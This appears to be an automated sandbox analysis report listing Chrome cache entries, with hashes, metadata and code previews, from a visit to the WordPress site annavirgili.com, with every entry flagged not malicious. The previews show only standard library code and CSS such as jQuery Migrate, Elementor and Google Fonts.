                                                                        Preview:/*!.Chosen, a Select Box Enhancer for jQuery and Prototype.by Patrick Filler for Harvest, http://getharvest.com..Version WOOF Custom.Full source at https://github.com/harvesthq/chosen.Copyright (c) Harvest http://getharvest.com..MIT License, https://github.com/harvesthq/chosen/blob/master/LICENSE.md.This file is generated by `grunt build`, do not edit it by hand..*/.."use strict";..(function() {. var $, AbstractChosen, Chosen, SelectParser,. bind = function(fn, me){ return function(){ return fn.apply(me, arguments); }; },. extend = function(child, parent) { for (var key in parent) { if (hasProp.call(parent, key)) child[key] = parent[key]; } function ctor() { this.constructor = child; } ctor.prototype = parent.prototype; child.prototype = new ctor(); child.__super__ = parent.prototype; return child; },. hasProp = {}.hasOwnProperty;.. SelectParser = (function() {. function SelectParser() {. this.options_index = 0;. this.parsed = [];. }.. SelectParser.prototy

                                                                        Chrome Cache Entry: 486

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):2219
                                                                        Entropy (8bit):5.409739127256831
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:A1B66AE4FBB0EFF2B25D263E7E0E3776
                                                                        SHA1:3C2688F0D491CA74EA7150AF27F4232401D46767
                                                                        SHA-256:ADF768C23E06CAA3676973294122E24048A1296AE400745BA47E08BD39276E06
                                                                        SHA-512:A4E5CD3C596FDA473D5BF9B16AD25CE91ED5DC91265BCA9C24897DEE75F8D12EEFE56400098D46364411D06F414BCCDE5AFC53F18B15B2AACE104A7AD893D41C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://fonts.googleapis.com/css?family=Roboto:400
                                                                        Preview:/* cyrillic-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu72xKOzY.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu5mxKOzY.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu7mxKOzY.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4WxKOzY.woff2) format('woff2');. unicode-range: U+0370-0377

                                                                        Chrome Cache Entry: 487

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (12198), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):12198
                                                                        Entropy (8bit):5.031745242580206
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:3819C3569DA71DAEC283A75483735F7E
                                                                        SHA1:ECD40A5CC6F0B76200C454CA880210DC301CFAB8
                                                                        SHA-256:214674CC77ABA35AB3567B88E2739FD08E8E96C61D279559AD61874069683EA0
                                                                        SHA-512:2710655DFF46653DAEB3A6E3F6D36F885E51D5B375738EE353ACA40C6F66AE1A7DECE57039D58747012ED9EA2822191143C06F270123B8CC580F6A41B8E8AEF4
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){"use strict";function Waypoint(options){if(!options)throw new Error("No options passed to Waypoint constructor");if(!options.element)throw new Error("No element option passed to Waypoint constructor");if(!options.handler)throw new Error("No handler option passed to Waypoint constructor");this.key="waypoint-"+keyCounter,this.options=Waypoint.Adapter.extend({},Waypoint.defaults,options),this.element=this.options.element,this.adapter=new Waypoint.Adapter(this.element),this.callback=options.handler,this.axis=this.options.horizontal?"horizontal":"vertical",this.enabled=this.options.enabled,this.triggerPoint=null,this.group=Waypoint.Group.findOrCreate({name:this.options.group,axis:this.axis}),this.context=Waypoint.Context.findOrCreateByElement(this.options.context),Waypoint.offsetAliases[this.options.offset]&&(this.options.offset=Waypoint.offsetAliases[this.options.offset]),this.group.add(this),this.context.add(this),allWaypoints[this.key]=this,keyCounter+=1}var keyCounter=0,allW

                                                                        Chrome Cache Entry: 488

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2577)
                                                                        Category:downloaded
                                                                        Size (bytes):2578
                                                                        Entropy (8bit):5.177015723485366
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:9BB8540493A7FE11B229870EB37BE165
                                                                        SHA1:D77F17CB9057DC8F622B8C0BF23F6ACB739B3B8E
                                                                        SHA-256:4A7EE62EB33F3BBB66C2151E5CAC6BF4904E28302EFC36128F3E3CCAE6FDE580
                                                                        SHA-512:FB245059108EE476BFBCA60A96D401C2796EE44B646E0874D41B5FDB1204A66E3BEC6A4AB8E155E50489B3ADF48BD609683B3D1C020B9F39D084A915F8377773
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.6.1
                                                                        Preview:(function(a){window.ShareLink=function(b,c){var d,e={},f=function(a){var b=a.substr(0,e.classPrefixLength);return b===e.classPrefix?a.substr(e.classPrefixLength):null},g=function(a){d.on("click",function(){h(a)})},h=function(a){var b="";if(e.width&&e.height){var c=screen.width/2-e.width/2,d=screen.height/2-e.height/2;b="toolbar=0,status=0,width="+e.width+",height="+e.height+",top="+d+",left="+c}var f=ShareLink.getNetworkLink(a,e),g=/^https?:\/\//.test(f),h=g?"":"_self";open(f,h,b)},i=function(){a.each(b.classList,function(){var a=f(this);if(a)return g(a),!1})},j=function(){a.extend(e,ShareLink.defaultSettings,c),["title","text"].forEach(function(a){e[a]=e[a].replace("#","")}),e.classPrefixLength=e.classPrefix.length},k=function(){d=a(b)};(function(){j(),k(),i()})()},ShareLink.networkTemplates={twitter:"https://twitter.com/intent/tweet?text={text}\x20{url}",pinterest:"https://www.pinterest.com/pin/create/button/?url={url}&media={image}",facebook:"https://www.facebook.com/sharer.php?u={u

                                                                        Chrome Cache Entry: 491

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (13479)
                                                                        Category:downloaded
                                                                        Size (bytes):13577
                                                                        Entropy (8bit):5.272065782731947
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:9FFEB32E2D9EFBF8F70CAABDED242267
                                                                        SHA1:3AD0C10E501AC2A9BFA18F9CD7E700219B378738
                                                                        SHA-256:5274F11E6FB32AE0CF2DFB9F8043272865C397A7C4223B4CFA7D50EA52FBDE89
                                                                        SHA-512:8D6BE545508A1C38278B8AD780C3758AE48A25E4E12EEE443375AA56031D9B356F8C90F22D4F251140FA3F65603AF40523165E33CAE2E2D62FC78EC106E3D731
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
                                                                        Preview:/*! jQuery Migrate v3.4.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */."undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e,window)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery"),window):t(jQuery,window)}(function(s,n){"use strict";function e(e){return 0<=function(e,t){for(var r=/^(\d+)\.(\d+)\.(\d+)/,n=r.exec(e)||[],o=r.exec(t)||[],a=1;a<=3;a++){if(+o[a]<+n[a])return 1;if(+n[a]<+o[a])return-1}return 0}(s.fn.jquery,e)}s.migrateVersion="3.4.1";var t=Object.create(null);s.migrateDisablePatches=function(){for(var e=0;e<arguments.length;e++)t[arguments[e]]=!0},s.migrateEnablePatches=function(){for(var e=0;e<arguments.length;e++)delete t[arguments[e]]},s.migrateIsPatchEnabled=function(e){return!t[e]},n.console&&n.console.log&&(s&&e("3.0.0")&&!e("5.0.0")||n.console.log("JQMIGRATE: jQuery 3.x-4.x REQUIRED"),s.migrateWarnings

                                                                        Chrome Cache Entry: 492

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (692)
                                                                        Category:dropped
                                                                        Size (bytes):880
                                                                        Entropy (8bit):5.14196063083674
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:B045121A36D5EE0879462864E20EDF9D
                                                                        SHA1:D0E40DEFA674F372E31AAE81AF0742E1E72816A8
                                                                        SHA-256:2A8CFEC8C79789EE642BF0021FB2B00D5B5CDB2AB9CD2B81F325CE4037481322
                                                                        SHA-512:C746EA63FD093B985A962E520B8CD52F36D863DA92D064223315A174CD69F802F427C324C7584C6B12A9A9D32DDE3CDDDD6D9CF964F2EDF8F3AB1E069ED07095
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:/*!. * jQuery UI Effects Blind 1.13.3. * https://jqueryui.com. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license.. * https://jquery.org/license. */.!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery","../version","../effect"],e):e(jQuery)}(function(s){"use strict";return s.effects.define("blind","hide",function(e,t){var i={up:["bottom","top"],vertical:["bottom","top"],down:["top","bottom"],left:["right","left"],horizontal:["right","left"],right:["left","right"]},o=s(this),n=e.direction||"up",c=o.cssClip(),f={clip:s.extend({},c)},r=s.effects.createPlaceholder(o);f.clip[i[n][0]]=f.clip[i[n][1]],"show"===e.mode&&(o.cssClip(f.clip),r&&r.css(s.effects.clipToBox(f)),f.clip=c),r&&r.animate(s.effects.clipToBox(f),e.duration,e.easing),o.animate(f,{queue:!1,duration:e.duration,easing:e.easing,complete:t})})});

                                                                        Chrome Cache Entry: 493

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:HTML document, ASCII text, with very long lines (8930), with CRLF, LF line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):208219
                                                                        Entropy (8bit):5.530583276023314
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E6F316DF74C47256D40E82E64614DA08
                                                                        SHA1:9F5EA5B4B0AFF0BAD064CB844CC19FB69D534389
                                                                        SHA-256:03885B9304040C4A0FE7F47B7F3C79FC96F7A04941823514C35C8ACB622991E9
                                                                        SHA-512:8116AD557AA4F0255AB63DBAF7D65AAFEF7E842E35F15DE2EA5FCE764A055CE7DF53B52C254C502722AEC51C7B196ED3586F95D978D54C99C4748FDD44CA1085
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/
                                                                        Preview:<!doctype html>.<html lang="it-IT">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2.0">. <title>Anna Virgili</title>.<meta name='robots' content='max-image-preview:large' />..<style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>..<link rel='dns-prefetch' href='//www.googletagmanager.com' />.<link rel='dns-prefetch' href='//fonts.googleapis.com' />.<link rel="alternate" type="application/rss+xml" title="Anna Virgili &raquo; Feed" href="https://annavirgili.com/feed/" />.<link rel="alternate" type="application/rss+xml" title="Anna Virgili &raquo; Feed dei commenti" href="https://annavirgili.com/comments/feed/" />.<script type="text/javascript">./* <![CDATA[ */.window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemo

                                                                        Chrome Cache Entry: 495

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (1324), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):1324
                                                                        Entropy (8bit):4.304924023820123
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:6D3035233D2C82F23C066A798E85C17C
                                                                        SHA1:B440A7CEBE6AD450C02F98035C1DC9DE212E4CCE
                                                                        SHA-256:A1782A1A429AA942BDDCFA3F5511E8B8DE26CC27B2F65FBCE7958E3B9F236432
                                                                        SHA-512:B5C867F4DBB3443CE78440D4FF1BA47134249C0F10B69942AE8B2CC12376C4355E02E1C849D2644C200F5DB9DBA91BF55D457619F89E0ABB5DC866DC4BE944D1
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/tooltip/css/plugins/tooltipster/sideTip/themes/tooltipster-sideTip-noir.min.css?ver=3.3.0
                                                                        Preview:.tooltipster-sidetip.tooltipster-noir .tooltipster-box{border-radius:0;border:3px solid #000;background:#fff}.tooltipster-sidetip.tooltipster-noir .tooltipster-content{color:#000}.tooltipster-sidetip.tooltipster-noir .tooltipster-arrow{height:11px;margin-left:-11px;width:22px}.tooltipster-sidetip.tooltipster-noir.tooltipster-left .tooltipster-arrow,.tooltipster-sidetip.tooltipster-noir.tooltipster-right .tooltipster-arrow{height:22px;margin-left:0;margin-top:-11px;width:11px}.tooltipster-sidetip.tooltipster-noir .tooltipster-arrow-background{border:11px solid transparent}.tooltipster-sidetip.tooltipster-noir.tooltipster-bottom .tooltipster-arrow-background{border-bottom-color:#fff;top:4px}.tooltipster-sidetip.tooltipster-noir.tooltipster-left .tooltipster-arrow-background{border-left-color:#fff;left:-4px}.tooltipster-sidetip.tooltipster-noir.tooltipster-right .tooltipster-arrow-background{border-right-color:#fff;left:4px}.tooltipster-sidetip.tooltipster-noir.tooltipster-top .tooltipste

                                                                        Chrome Cache Entry: 496

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (37635)
                                                                        Category:downloaded
                                                                        Size (bytes):37674
                                                                        Entropy (8bit):5.189436479341472
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:361105B44EBABAE341A9F5E44F85DB04
                                                                        SHA1:86C4A2C7D84E6D9D14927888AD60CBECB720C5B8
                                                                        SHA-256:33075D9D58CF7FBE468294E693402E85BB2D50F86EE5B42091E5190EEDD75AFC
                                                                        SHA-512:2A35C8768B4046274877D2D7FF0ED8C42946B22387C7F61A6D0F1C1B449A8E4D165FA7518E4A1691527E9116CE643C74A4577D8A9BA7417008895E20549BE7BE
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.6.1
                                                                        Preview:/*! elementor - v3.6.1 - 23-03-2022 */."use strict";(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[819],{9220:(e,t,n)=>{var i=n(7914);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var s=i(n(8135));class _default extends elementorModules.ViewModule{constructor(...e){super(...e),this.documents={},this.initDocumentClasses(),this.attachDocumentsClasses()}getDefaultSettings(){return{selectors:{document:".elementor"}}}getDefaultElements(){const e=this.getSettings("selectors");return{$documents:jQuery(e.document)}}initDocumentClasses(){this.documentClasses={base:s.default},elementorFrontend.hooks.doAction("elementor/frontend/documents-manager/init-classes",this)}addDocumentClass(e,t){this.documentClasses[e]=t}attachDocumentsClasses(){this.elements.$documents.each(((e,t)=>this.attachDocumentClass(jQuery(t))))}attachDocumentClass(e){const t=e.data(),n=t.elementorId,i=t.elementorType,s=this.documentClasses[i]||this.documentClasses.base;this.documents[n]=ne

                                                                        Chrome Cache Entry: 497

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65493)
                                                                        Category:downloaded
                                                                        Size (bytes):132804
                                                                        Entropy (8bit):5.111206986028066
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:5B957A80A02395D0183527BDA5A86E64
                                                                        SHA1:4D985B49A7AB3953DFF5355ECAC6885E97D40CED
                                                                        SHA-256:7EC7AC5F949B4D6F1DD313C062EC21769E446BCB17FEC74ACE339C3BCC8FAF94
                                                                        SHA-512:338AFE13694BD05E2FDC59A36983C5CF036FACC76B2C4F0294BFED9412B89E79B711F28B24C76746A4B9A10F14AE58219D94D5E589D517A8A6F7D411E3E34C53
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/elementor-pro/assets/js/preloaded-elements-handlers.min.js?ver=3.6.4
                                                                        Preview:/*! elementor-pro - v3.6.4 - 15-03-2022 */."use strict";(self.webpackChunkelementor_pro=self.webpackChunkelementor_pro||[]).push([[995,26,534,369,804,888,680,121,288,42,50,985,287,824,58,114,443,838,685,858,102,1,124,859,979,497],{9978:(e,t,s)=>{var n=s(7914),i=n(s(5574)),o=n(s(9743)),r=n(s(8102)),a=n(s(585)),l=n(s(9086)),d=n(s(1559)),c=n(s(9937)),h=n(s(7317)),m=n(s(2140)),u=n(s(6484)),p=n(s(6208)),g=n(s(8746)),f=n(s(1060)),v=n(s(3334)),_=n(s(5475)),S=n(s(224)),y=n(s(7318));const extendDefaultHandlers=e=>({...e,...{animatedText:i.default,carousel:o.default,countdown:r.default,form:a.default,gallery:l.default,hotspot:d.default,lottie:c.default,nav_menu:h.default,popup:m.default,posts:u.default,share_buttons:p.default,slides:g.default,social:f.default,themeBuilder:_.default,themeElements:S.default,woocommerce:y.default,tableOfContents:v.default}});elementorProFrontend.on("elementor-pro/modules/init:before",(()=>{elementorFrontend.hooks.addFilter("elementor-pro/frontend/handlers",extendDe

                                                                        Static File Info

                                                                        No static file info